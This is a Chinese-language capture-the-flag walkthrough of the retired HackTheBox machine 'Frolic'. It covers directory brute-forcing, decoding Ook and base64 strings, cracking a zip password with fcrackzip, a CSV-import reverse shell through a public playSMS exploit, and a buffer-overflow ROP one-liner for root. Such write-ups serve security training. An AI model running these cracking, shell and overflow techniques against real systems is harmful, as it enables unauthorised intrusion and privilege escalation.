本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.111
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.111 -o ./Frolic-autorecon
爆破到目录admin访问下
没发现啥东西,查看下网页源代码
看到一个js文件
发现有个success.html的路径
访问结果如上,经过谷歌搜索确认跟密码学有关,解密地址:https://www.splitbrain.org/_static/ook/
得到上面的一个路径,再访问一把
得到上面的base64编码信息,将其解码重定向到一个文件中
sudo echo 'UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwABBAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbsK1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmveEMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTjlurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkCAAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUGAAAAAAEAAQBPAAAAAwEAAAAA' | base64 -d > bmfx
发现是zip格式的文件, 将此文件添加后缀为zip格式,然后再使用unzip进行解压,发现需要密钥,直接是字典rockyou.txt通过fcrackzip进行破解
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u bmfx.zip
解压后得到文件index.php
确认上述内容是16进制文件,通过在线16进制转换,将其转换为字符
又得到了base64编码,将其解码
又回到刚开始的密码学知识点,再次将其解密,地址:https://www.splitbrain.org/_static/ook/
看上面意思就是密码了,登录http://10.10.10.111:9999/admin/ 显示登录有问题,不能正常登录,我们再回到上面爆破的目录中发现dev,访问显示403,再通过gobuster进行目录爆破,发现了dev下面还存在个backup
到了这一步就可以通过metasploit直接使用exploit进行利用了,我这里还是喜欢手动操作,对应的exploit地址:https://www.exploit-db.com/exploits/42044
详细的演示方法可以看上面链接中作者给的视频链接查看,我这里利用完成再访问显示504,所以无法给大家演示了,大概方式就是找到导入电话本的导入功能,然后本地新建一个csv格式的文件,里面写入如下内容
导入之后在firefox浏览器中配置反弹代码,然后本地监听反弹端口即可
上述配置好之后,导入csv格式的文件即可成功反弹shell
读取完成user.txt之后查找4000权限的文件
找到一个二进制文件,知道本靶机需要使用缓冲区溢出漏洞进行提权,具体分析可参考:https://0xdf.gitlab.io/2019/03/23/htb-frolic.html
./rop `python -c "print 'A'*52 + 'xa0x3dxe5xb7' + 'xd0x79xe4xb4' + 'x0bx4axf7xb7'"`